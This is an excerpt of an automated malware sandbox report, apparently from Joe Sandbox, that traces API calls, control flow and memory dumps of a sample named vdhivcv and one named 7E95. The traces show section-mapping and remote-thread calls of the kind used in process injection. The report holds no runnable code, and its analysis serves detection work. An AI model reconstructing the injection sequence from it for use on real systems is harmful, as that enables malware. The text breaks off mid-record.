                                                                                                                          • Source File: 00000005.00000002.1983485699.0000000000A7C000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A7C000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_a7c000_vdhivcv.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3833638111-0
                                                                                                                          • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                          • Instruction ID: 63daa0472ec49498760be9c3f2991bcfeedb7ab3e3cc0e17fc8813642237e36a
                                                                                                                          • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                          • Instruction Fuzzy Hash: EDF0F6315007506FD7203BF59C8DFAE76ECAF48320F108538E64A910D0DB70EE054A60

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 407 9a0e0f-9a0e24 SetErrorMode * 2 408 9a0e2b-9a0e2c 407->408 409 9a0e26 407->409 409->408
                                                                                                                          APIs
                                                                                                                          • SetErrorMode.KERNELBASE(00000400,?,?,009A0223,?,?), ref: 009A0E19
                                                                                                                          • SetErrorMode.KERNELBASE(00000000,?,?,009A0223,?,?), ref: 009A0E1E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.1983346956.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_9a0000_vdhivcv.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorMode
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2340568224-0
                                                                                                                          • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                          • Instruction ID: d8bb08acbce6a36e491080eca6a53d73b7e546759d24ac258b579eee218141b3
                                                                                                                          • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                          • Instruction Fuzzy Hash: 8AD0123114512877DB402A94DC09BCD7B1CDF09B62F108411FB0DD9080C770994046E5

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 426 41be70-41bf04 LoadLibraryW
                                                                                                                          APIs
                                                                                                                          • LoadLibraryW.KERNELBASE(00806520,0041C3E3), ref: 0041BEFE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.1983099018.000000000040F000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040F000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_40f000_vdhivcv.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1029625771-0
                                                                                                                          • Opcode ID: 0a15243abbb77dc1b97bfc58dabe9b54cb40a51112934ec330926107e8d3d963
                                                                                                                          • Instruction ID: da6e4b38e2470e7c04c496aabc0c9d80adc5fe69ae97a20b7dcc95448944ea40
                                                                                                                          • Opcode Fuzzy Hash: 0a15243abbb77dc1b97bfc58dabe9b54cb40a51112934ec330926107e8d3d963
                                                                                                                          • Instruction Fuzzy Hash: F8F06234729242C6E784DB64FD517112A22FF6EB00F10642A9109CB7F8F6BA8931C71E

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 427 401a23-401a66 435 401a69-401a8b call 4012cb Sleep call 401546 427->435 436 401a5d-401a62 427->436 441 401a9a-401ae4 call 4012cb 435->441 442 401a8d-401a95 call 401652 435->442 436->435 442->441
                                                                                                                          APIs
                                                                                                                          • Sleep.KERNELBASE(00001388), ref: 00401A76
                                                                                                                            • Part of subcall function 00401652: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002,?,0000000C), ref: 0040170E
                                                                                                                            • Part of subcall function 00401652: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,0000000C), ref: 0040173B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.1983080640.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_vdhivcv.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4152845823-0
                                                                                                                          • Opcode ID: 4a6ab7f2a7f3b1899ba0f8ed2be186294e385831c40161cfa846fbc6bea8b304
                                                                                                                          • Instruction ID: 91b5110070e0c44bf95986206989ec6c2ce5463c47e088f607755108aacdec66
                                                                                                                          • Opcode Fuzzy Hash: 4a6ab7f2a7f3b1899ba0f8ed2be186294e385831c40161cfa846fbc6bea8b304
                                                                                                                          • Instruction Fuzzy Hash: 51018E3530E204E7DB00AA908D81E7B3268EB41354F2041B7B603751F1D53D9A136F2F

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 456 401a2f-401a66 460 401a69-401a8b call 4012cb Sleep call 401546 456->460 461 401a5d-401a62 456->461 466 401a9a-401ae4 call 4012cb 460->466 467 401a8d-401a95 call 401652 460->467 461->460 467->466
                                                                                                                          APIs
                                                                                                                          • Sleep.KERNELBASE(00001388), ref: 00401A76
                                                                                                                            • Part of subcall function 00401652: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002,?,0000000C), ref: 0040170E
                                                                                                                            • Part of subcall function 00401652: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,0000000C), ref: 0040173B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.1983080640.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_vdhivcv.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4152845823-0
                                                                                                                          • Opcode ID: cf572ce4c71145162733ed5eae8eac49e4cb303809c2186d68ef726cba448547
                                                                                                                          • Instruction ID: 0602fc03d50bbbe6fc42af46552b92fff0d4f1b5710024386572b4c46d7e865f
                                                                                                                          • Opcode Fuzzy Hash: cf572ce4c71145162733ed5eae8eac49e4cb303809c2186d68ef726cba448547
                                                                                                                          • Instruction Fuzzy Hash: 5001963670A244EBDB01AA91CD91FAA3378DB44314F2441B7B613751F2D63D9A13AF1B
                                                                                                                          APIs
                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00A7F339
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.1983485699.0000000000A7C000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A7C000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_a7c000_vdhivcv.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4275171209-0
                                                                                                                          • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                          • Instruction ID: b0eae3ed3dab763f16c39854a2df72d6acd42be6f85b6ce743c80768527dcc3c
                                                                                                                          • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                          • Instruction Fuzzy Hash: 8F112D79A00208FFDB01DF98C985E98BBF5AF08350F15C0A4F9489B361D371EA50DB90
                                                                                                                          APIs
                                                                                                                          • Sleep.KERNELBASE(00001388), ref: 00401A76
                                                                                                                            • Part of subcall function 00401652: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002,?,0000000C), ref: 0040170E
                                                                                                                            • Part of subcall function 00401652: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,0000000C), ref: 0040173B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.1983080640.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_vdhivcv.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4152845823-0
                                                                                                                          • Opcode ID: 396eb1de65484f458ea31e8b5f0b6f3a394b8df51d3751b13c73184ee183ca9d
                                                                                                                          • Instruction ID: cc39f782a2c04dae7e3acb03cf37aaca09712356619e57787449d6207a1c97e1
                                                                                                                          • Opcode Fuzzy Hash: 396eb1de65484f458ea31e8b5f0b6f3a394b8df51d3751b13c73184ee183ca9d
                                                                                                                          • Instruction Fuzzy Hash: 0F01A736745244E7DB00AA948C82EAA3774DB41314F2445B7F613B51E2D63D89136F1B
                                                                                                                          APIs
                                                                                                                          • GetStringTypeA.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 0041C1F6
                                                                                                                          • BuildCommDCBW.KERNEL32(00000000,00000000), ref: 0041C1FE
                                                                                                                          • GetTimeFormatA.KERNEL32(00000000,00000000,?,0041E30C,?,00000000), ref: 0041C230
                                                                                                                          • SetThreadAffinityMask.KERNEL32(00000000,00000000), ref: 0041C238
                                                                                                                          • GetConsoleAliasExesLengthA.KERNEL32 ref: 0041C23E
                                                                                                                          • OpenWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 0041C247
                                                                                                                          • GetProcessHandleCount.KERNEL32(00000000,00000000), ref: 0041C24F
                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,00000000,?,00000000), ref: 0041C260
                                                                                                                          • GlobalAlloc.KERNEL32(00000000,00000000), ref: 0041C268
                                                                                                                          • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 0041C2A1
                                                                                                                          • GetSystemWindowsDirectoryW.KERNEL32(?,00000000), ref: 0041C2B0
                                                                                                                          • WriteConsoleA.KERNEL32(00000000,?,00000000,?,00000000), ref: 0041C2C3
                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0041C2CA
                                                                                                                          • GetThreadContext.KERNEL32(00000000,00000000), ref: 0041C2D2
                                                                                                                          • FindAtomW.KERNEL32(00000000), ref: 0041C2D9
                                                                                                                          • SetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 0041C2FA
                                                                                                                          • GetConsoleAliasW.KERNEL32(00000000,?,00000000,00000000), ref: 0041C30B
                                                                                                                          • MoveFileW.KERNEL32(00000000,00000000), ref: 0041C313
                                                                                                                          • DisconnectNamedPipe.KERNEL32(?), ref: 0041C322
                                                                                                                          • ReadConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 0041C357
                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 0041C367
                                                                                                                          • OpenFileMappingA.KERNEL32(00000000,00000000,00000000), ref: 0041C379
                                                                                                                          • GlobalAlloc.KERNEL32(00000000,0080651C), ref: 0041C38F
                                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 0041C433
                                                                                                                          • GetSystemTime.KERNEL32(00000000), ref: 0041C43B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.1983099018.000000000040F000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040F000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_40f000_vdhivcv.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Console$File$AliasAllocCommGlobalHandleInterlockedModuleOpenSystemThreadTime$AffinityAtomBuildCompareConfigContextCountDecrementDefaultDirectoryDisconnectExchangeExesFindFormatInfoLengthLocaleMappingMaskMoveNameNamedOutputPipeProcessReadStringTimerTypeWaitableWindowsWrite
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2854953312-0
                                                                                                                          • Opcode ID: 87ab2a57b8964d837c89f0e86aa00f89e0aa0f6be5dbe2d1e3f6e6aee76b549b
                                                                                                                          • Instruction ID: c7d6ded2a409469651c71b0e0d077ad49e249c2ac0b9428d9b7779592f733872
                                                                                                                          • Opcode Fuzzy Hash: 87ab2a57b8964d837c89f0e86aa00f89e0aa0f6be5dbe2d1e3f6e6aee76b549b
                                                                                                                          • Instruction Fuzzy Hash: F5A162F2944304AFD314DF64DCC4EAB7BACFB8C308F00992EF54696161D73899558BA9

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:9.4%
                                                                                                                          Dynamic/Decrypted Code Coverage:19.6%
                                                                                                                          Signature Coverage:0%
                                                                                                                          Total number of Nodes:143
                                                                                                                          Total number of Limit Nodes:6
                                                                                                                          execution_graph 3740 401707 3741 4016c0 NtMapViewOfSection 3740->3741 3742 4016e2 3740->3742 3741->3742 3602 a3f1eb 3603 a3f1fa 3602->3603 3606 a3f98b 3603->3606 3611 a3f9a6 3606->3611 3607 a3f9af CreateToolhelp32Snapshot 3608 a3f9cb Module32First 3607->3608 3607->3611 3609 a3f9da 3608->3609 3612 a3f203 3608->3612 3613 a3f64a 3609->3613 3611->3607 3611->3608 3614 a3f675 3613->3614 3615 a3f686 VirtualAlloc 3614->3615 3616 a3f6be 3614->3616 3615->3616 3533 41d610 3536 41d240 3533->3536 3535 41d615 3537 41d250 3536->3537 3538 41d311 8 API calls 3537->3538 3539 41d39d 3537->3539 3538->3539 3540 41d3c9 6 API calls 3539->3540 3541 41d4bd LocalAlloc 3539->3541 3543 41d41f 6 API calls 3540->3543 3547 41d4d9 3541->3547 3545 41d4a6 OpenFileMappingA 3543->3545 3546 41d4af 3543->3546 3544 41d513 3555 41cde0 GetModuleHandleW GetProcAddress VirtualProtect 3544->3555 3545->3546 3546->3541 3554 41cf20 LoadLibraryW 3547->3554 3549 41d518 3556 41d1b0 3549->3556 3551 41d539 QueryMemoryResourceNotification 3552 41d51d 3551->3552 3552->3551 3553 41d570 3552->3553 3553->3535 3554->3544 3555->3549 3565 41d010 3556->3565 3559 41d1e9 GetEnvironmentStringsW 3560 41d1ef 3559->3560 3568 41d080 3560->3568 3563 41d207 GetConsoleAliasesA GetVolumePathNameA 3564 41d228 3563->3564 3564->3552 3566 41d051 3565->3566 3567 41d03c GetCommandLineA GetModuleFileNameA 3565->3567 3566->3559 3566->3560 3567->3566 3569 41d16d 3568->3569 3571 41d0af 3568->3571 3569->3563 3569->3564 3571->3569 3572 41d117 GetComputerNameA SetCalendarInfoA OpenJobObjectW GetShortPathNameW RegCreateKeyA 3571->3572 3573 41d070 3571->3573 3572->3571 3576 41cfc0 3573->3576 3577 41cfdd DeleteAce 3576->3577 3578 41cfee 3576->3578 3577->3578 3578->3571 3791 402fd6 3792 403119 3791->3792 3793 403000 3791->3793 3793->3792 3794 4030bb RtlCreateUserThread NtTerminateProcess 3793->3794 3794->3792 3643 4014dc 3644 4014e3 3643->3644 3645 4015c6 NtDuplicateObject 3644->3645 3650 401509 3644->3650 3646 4015e3 NtCreateSection 3645->3646 3645->3650 3647 401663 NtCreateSection 3646->3647 3648 401609 NtMapViewOfSection 3646->3648 3649 40168f 3647->3649 3647->3650 3648->3647 3651 40162c NtMapViewOfSection 3648->3651 3649->3650 3652 401699 NtMapViewOfSection 3649->3652 3651->3647 3653 40164a 3651->3653 3652->3650 3654 4016c0 NtMapViewOfSection 3652->3654 3653->3647 3654->3650 3795 88092b GetPEB 3796 880972 3795->3796 3761 401525 3762 40153c 3761->3762 3763 4015c6 NtDuplicateObject 3762->3763 3768 4016e2 3762->3768 3764 4015e3 NtCreateSection 3763->3764 3763->3768 3765 401663 NtCreateSection 3764->3765 3766 401609 NtMapViewOfSection 3764->3766 3767 40168f 3765->3767 3765->3768 3766->3765 3769 40162c NtMapViewOfSection 3766->3769 3767->3768 3770 401699 NtMapViewOfSection 3767->3770 3769->3765 3771 40164a 3769->3771 3770->3768 3772 4016c0 NtMapViewOfSection 3770->3772 3771->3765 3772->3768 3598 403127 3599 403130 3598->3599 3600 4030c6 RtlCreateUserThread NtTerminateProcess 3598->3600 3601 403119 3600->3601 3655 41d4e6 3656 41d4f0 3655->3656 3665 41cf20 LoadLibraryW 3656->3665 3658 41d513 3666 41cde0 GetModuleHandleW GetProcAddress VirtualProtect 3658->3666 3660 41d518 3661 41d1b0 11 API calls 3660->3661 3663 41d51d 3661->3663 3662 41d539 QueryMemoryResourceNotification 3662->3663 3663->3662 3664 41d570 3663->3664 3665->3658 3666->3660 3617 402eab 3618 402eb0 3617->3618 3620 402f38 3618->3620 3621 4018ec 3618->3621 3622 4018f3 3621->3622 3623 401933 Sleep 3622->3623 3624 40194e 3623->3624 3626 40195f 3624->3626 3627 40151a 3624->3627 3626->3620 3628 40152a 3627->3628 3629 4015c6 NtDuplicateObject 3628->3629 3634 4016e2 3628->3634 3630 4015e3 NtCreateSection 3629->3630 3629->3634 3631 401663 NtCreateSection 3630->3631 3632 401609 NtMapViewOfSection 3630->3632 3633 40168f 3631->3633 3631->3634 3632->3631 3635 40162c NtMapViewOfSection 3632->3635 3633->3634 3636 401699 NtMapViewOfSection 3633->3636 3634->3626 3635->3631 3637 40164a 3635->3637 3636->3634 3638 4016c0 NtMapViewOfSection 3636->3638 3637->3631 3638->3634 3639 402e73 3640 402e8b 3639->3640 3641 4018ec 8 API calls 3640->3641 3642 402f38 3640->3642 3641->3642 3579 88003c 3580 880049 3579->3580 3592 880e0f SetErrorMode SetErrorMode 3580->3592 3585 880265 3586 8802ce VirtualProtect 3585->3586 3588 88030b 3586->3588 3587 880439 VirtualFree 3591 8804be LoadLibraryA 3587->3591 3588->3587 3590 8808c7 3591->3590 3593 880223 3592->3593 3594 880d90 3593->3594 3595 880dad 3594->3595 3596 880dbb GetPEB 3595->3596 3597 880238 VirtualAlloc 3595->3597 3596->3597 3597->3585 3667 4018f8 3668 401907 3667->3668 3669 401933 Sleep 3668->3669 3670 40194e 3669->3670 3671 40151a 7 API calls 3670->3671 3672 40195f 3670->3672 3671->3672 3729 402f78 3731 402f83 3729->3731 3732 402fe3 3729->3732 3730 403119 3732->3730 3733 4030bb RtlCreateUserThread NtTerminateProcess 3732->3733 3733->3730

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 85 40151a-401534 87 401537-401570 call 4011a2 85->87 88 40152a-401530 85->88 98 401572 87->98 99 401575-40157a 87->99 88->87 98->99 101 401580-401591 99->101 102 40189d-4018a5 99->102 105 401597-4015c0 101->105 106 40189b 101->106 102->99 107 4018aa-4018ce 102->107 105->106 115 4015c6-4015dd NtDuplicateObject 105->115 106->107 118 4018d4-4018d9 107->118 119 4018dd 107->119 115->106 116 4015e3-401607 NtCreateSection 115->116 120 401663-401689 NtCreateSection 116->120 121 401609-40162a NtMapViewOfSection 116->121 123 4018e0-4018e9 call 4011a2 118->123 119->118 119->123 120->106 122 40168f-401693 120->122 121->120 124 40162c-401648 NtMapViewOfSection 121->124 122->106 125 401699-4016ba NtMapViewOfSection 122->125 124->120 127 40164a-401660 124->127 125->106 128 4016c0-4016dc NtMapViewOfSection 125->128 127->120 128->106 130 4016e2 call 4016e7 128->130
                                                                                                                          APIs
                                                                                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D5
                                                                                                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401602
                                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401625
                                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401643
                                                                                                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401684
                                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B5
                                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.2827895541.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_7_2_400000_7E95.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Section$View$Create$DuplicateObject
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1546783058-0
                                                                                                                          • Opcode ID: 6cf608cc6a48ddb5cbcaf390370d6f737a37c0c60a6f8fd006ffe9db2db37fae
                                                                                                                          • Instruction ID: 758367aa55518e9b0609bd9f996fee5d981b900bfb95b3b16150f351e66f2045
                                                                                                                          • Opcode Fuzzy Hash: 6cf608cc6a48ddb5cbcaf390370d6f737a37c0c60a6f8fd006ffe9db2db37fae
                                                                                                                          • Instruction Fuzzy Hash: 32614F71900204FBEB209F95DC49FAF7BB8FF85700F14412AFA12BA2E4D6749A05DB65

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 133 4014dc-4014e6 135 4014e9-401507 133->135 136 40154e-401570 call 4011a2 133->136 140 401530-40155a 135->140 141 401509-401517 135->141 144 401572 136->144 145 401575-40157a 136->145 140->136 144->145 149 401580-401591 145->149 150 40189d-4018a5 145->150 155 401597-4015c0 149->155 156 40189b 149->156 150->145 157 4018aa-4018ce 150->157 155->156 165 4015c6-4015dd NtDuplicateObject 155->165 156->157 168 4018d4-4018d9 157->168 169 4018dd 157->169 165->156 166 4015e3-401607 NtCreateSection 165->166 170 401663-401689 NtCreateSection 166->170 171 401609-40162a NtMapViewOfSection 166->171 173 4018e0-4018e9 call 4011a2 168->173 169->168 169->173 170->156 172 40168f-401693 170->172 171->170 174 40162c-401648 NtMapViewOfSection 171->174 172->156 175 401699-4016ba NtMapViewOfSection 172->175 174->170 177 40164a-401660 174->177 175->156 178 4016c0-4016dc NtMapViewOfSection 175->178 177->170 178->156 180 4016e2 call 4016e7 178->180
                                                                                                                          APIs
                                                                                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D5
                                                                                                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401602
                                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401625
                                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401643
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.2827895541.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_7_2_400000_7E95.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Section$View$CreateDuplicateObject
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3617974760-0
                                                                                                                          • Opcode ID: d18150f273f6ccb2de20f977413e906d5cd3d4fe8f62677aabc89b3c1d85e839
                                                                                                                          • Instruction ID: 01edf16a583d4862d470478f25ad7e601c2cab9d889f12ca766ce5cb4c4dd08c
                                                                                                                          • Opcode Fuzzy Hash: d18150f273f6ccb2de20f977413e906d5cd3d4fe8f62677aabc89b3c1d85e839
                                                                                                                          • Instruction Fuzzy Hash: C4616BB1900205BFEB209F91CC49FAF7BB8FF85700F14412AFA12BA2E5D6759941CB24

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 183 401525-401536 184 401545 183->184 185 40153c-401570 call 4011a2 183->185 184->185 192 401572 185->192 193 401575-40157a 185->193 192->193 195 401580-401591 193->195 196 40189d-4018a5 193->196 199 401597-4015c0 195->199 200 40189b 195->200 196->193 201 4018aa-4018ce 196->201 199->200 209 4015c6-4015dd NtDuplicateObject 199->209 200->201 212 4018d4-4018d9 201->212 213 4018dd 201->213 209->200 210 4015e3-401607 NtCreateSection 209->210 214 401663-401689 NtCreateSection 210->214 215 401609-40162a NtMapViewOfSection 210->215 217 4018e0-4018e9 call 4011a2 212->217 213->212 213->217 214->200 216 40168f-401693 214->216 215->214 218 40162c-401648 NtMapViewOfSection 215->218 216->200 219 401699-4016ba NtMapViewOfSection 216->219 218->214 221 40164a-401660 218->221 219->200 222 4016c0-4016dc NtMapViewOfSection 219->222 221->214 222->200 224 4016e2 call 4016e7 222->224
                                                                                                                          APIs
                                                                                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D5
                                                                                                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401602
                                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401625
                                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401643
                                                                                                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401684
                                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B5
                                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.2827895541.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_7_2_400000_7E95.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Section$View$Create$DuplicateObject
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1546783058-0
                                                                                                                          • Opcode ID: 03c546fdecbd4dabaee4adf1b6a307ad1c1ca8fb3c9340a70561610008c8f487
                                                                                                                          • Instruction ID: d98608343e3f268f61e04ba58ef06da7a665d7d64d49ae776654abfe3b75af18
                                                                                                                          • Opcode Fuzzy Hash: 03c546fdecbd4dabaee4adf1b6a307ad1c1ca8fb3c9340a70561610008c8f487
                                                                                                                          • Instruction Fuzzy Hash: 1D514A71900204BBEB209F91CC89FAF7BB8FF85B00F14412AF912BA2E5D6759941CB24

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 227 401543-401570 call 4011a2 236 401572 227->236 237 401575-40157a 227->237 236->237 239 401580-401591 237->239 240 40189d-4018a5 237->240 243 401597-4015c0 239->243 244 40189b 239->244 240->237 245 4018aa-4018ce 240->245 243->244 253 4015c6-4015dd NtDuplicateObject 243->253 244->245 256 4018d4-4018d9 245->256 257 4018dd 245->257 253->244 254 4015e3-401607 NtCreateSection 253->254 258 401663-401689 NtCreateSection 254->258 259 401609-40162a NtMapViewOfSection 254->259 261 4018e0-4018e9 call 4011a2 256->261 257->256 257->261 258->244 260 40168f-401693 258->260 259->258 262 40162c-401648 NtMapViewOfSection 259->262 260->244 263 401699-4016ba NtMapViewOfSection 260->263 262->258 265 40164a-401660 262->265 263->244 266 4016c0-4016dc NtMapViewOfSection 263->266 265->258 266->244 268 4016e2 call 4016e7 266->268
                                                                                                                          APIs
                                                                                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D5
                                                                                                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401602
                                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401625
                                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401643
                                                                                                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401684
                                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B5
                                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.2827895541.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_7_2_400000_7E95.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Section$View$Create$DuplicateObject
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1546783058-0
                                                                                                                          • Opcode ID: 7b7d6308fa4ba266436286a607709f1be1a66838caa3c92c62cfa2a56e0de30a
                                                                                                                          • Instruction ID: d74f1d91fdd76053a65fad1b4a3cd82dad45149c469138b683230667d1d9e81f
